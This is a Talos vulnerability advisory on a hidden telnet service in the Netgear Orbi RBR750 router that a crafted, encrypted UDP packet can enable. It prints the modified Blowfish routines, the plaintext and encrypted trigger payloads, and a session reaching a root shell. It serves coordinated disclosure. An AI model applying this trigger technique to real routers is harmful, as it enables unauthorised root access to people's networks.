Talos Vulnerability Report

SUMMARY

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

PRODUCT URLS

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-912 - Hidden Functionality

DETAILS

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

def crypt_64bit_up(self, x, y):
    sbox = self.flattened_sBox
    pArray = self.flattened_pArray
    for i in range(0, 0x10):
        z = pArray[i] ^ x
        x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
        x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
        x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
        x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
        x = y ^ x
        y = z
    x = x ^ pArray[-2]
    y = y ^ pArray[-1]
    return (x, y)

def crypt_64bit_down(self, x, y):
    sbox = self.flattened_sBox
    pArray = self.flattened_pArray
    for i in range(0x11, 1, -1):
        z = pArray[i] ^ x
        x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
        x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
        x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
        x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
        x = y ^ x
        y = z
    x = x ^ pArray[1]
    y = y ^ pArray[0]
    return (x, y) 

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

Exploit Proof of Concept

$ ./enable_telnet_poc.py
Plaintext payload:
00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
Encrypted payload:
00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d

$ telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
 === LOGIN ===============================
  Please enter your account and password,
  It's the same with DUT GUI
 ------------------------------------------
telnet account: admin
telnet password:

BusyBox v1.30.1 () built-in shell (ash)

  .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
 d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
888      888  888      888   888  888       .88ooo8888.      .8PY888.
`88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
 `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o

 ---------------------------------------------------------------
   For those about to rock... (Chaos Calmer, 10.0.3440.3644)
 ---------------------------------------------------------------
root@RBR750:/#

TIMELINE

2022-08-30 - Initial Vendor Contact
2022-09-05 - Vendor Disclosure
2023-03-21 - Public Release
2023-03-22 - Vendor Patch Release